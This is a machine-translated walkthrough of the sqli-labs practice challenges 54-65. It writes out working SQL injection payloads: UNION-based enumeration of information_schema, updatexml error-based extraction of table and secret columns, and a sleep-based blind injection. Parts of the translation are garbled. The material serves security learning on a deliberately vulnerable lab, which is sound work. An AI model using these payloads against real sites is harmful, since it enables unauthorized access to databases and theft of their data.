sql-lib break through the barrier of lesson54-65

Others 2020-03-17 19:56:51 views: null

LESS54

Level requirements: The goal of this challenge is to try to less than 10 times from a random table in the database dump (key for fun, each reset, the challenge will be to generate a random table names, column names and table data at all times remain fresh. .

① determines whether the number (dichotomy) column

Input: id = 1 'order by 3 - +?

 

 

② current database

? Enter: id = -1 'union select 1,2, database () - +

 

 

③ look-up table

输入:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+

 

 9po9d7v0i2

 

④ check field

输入:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='9po9d7v0i2' --+

 

 

⑤ check the value of the field

输入:?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_AMI8,tryy)) from challenges.9po9d7v0i2 --+

 

 1fecbfa88f364df34c32702b62f11a7d9Sic5glsmSMXhqiRnTYvYP5qv4

Click submit to finish by.

 

 You stupid hacker put off!

 

LESS55

 

 Parameters: (1)

: 14 times


LESS56

 

 

Parameter :( '1')

: 14 times
LESS57

 

 

Parameters: "1"

: 14 times
LESS58

: 5 times

This clearance can not use union select no return echo location.

We use the error injection. 

① look-up table

It is a database of known challenges

输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --+

 

 

② check field

输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jxpizjpo9r')),1) --+

 

 

③ lookup field

输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_XMHT) from challenges.jxpizjpo9r)),1) --+

 

 

 

 Congratulations on your success!


LESS59

Parameters: id = 1 unwrapping
LESS60

Parameters: ID = ( ". 1")
LESS61

Parameters: ID = (( '. 1'))
LESS62

 

 A total of 130 times, it is obvious to the blind! !

输入:?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 'a' ,1, sleep(5)) --+

Sequentially changing its value can be determined.
LESS63

Parameters: '. 1'
LESS64

Parameters: ((. 1))
LESS65

Parameters :( "1")

Guess you like

Origin www.cnblogs.com/c1047509362/p/12512621.html
Recommended
The number of MaxKB GitHub Stars, an open source knowledge base question and answer system based on large language models, exceeded 5,000!
Ranking
Getting the basic concepts of ROS + catkin Profile
Spring Learning (2) --- Assembling Beans in the IoC Container
js to get the src attribute of the image regularly
STM32 is based on CubeIDE and HAL library basics entry study notes: Bluetooth WIFI STM32 connects to Alibaba Cloud
Short video learning - 3, pandas simple use of pivot_table
Print directory of project configuration log, output log
Understand the difference between vi and vim in Linux in 3 minutes
1 + x certificate Web front-end development HTML5 special exercises
mangodb save and insert the difference
7-1 Family tree processing (50 points) (binary tree solution)
Daily
More
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)

Code World

© 2018 codetd.com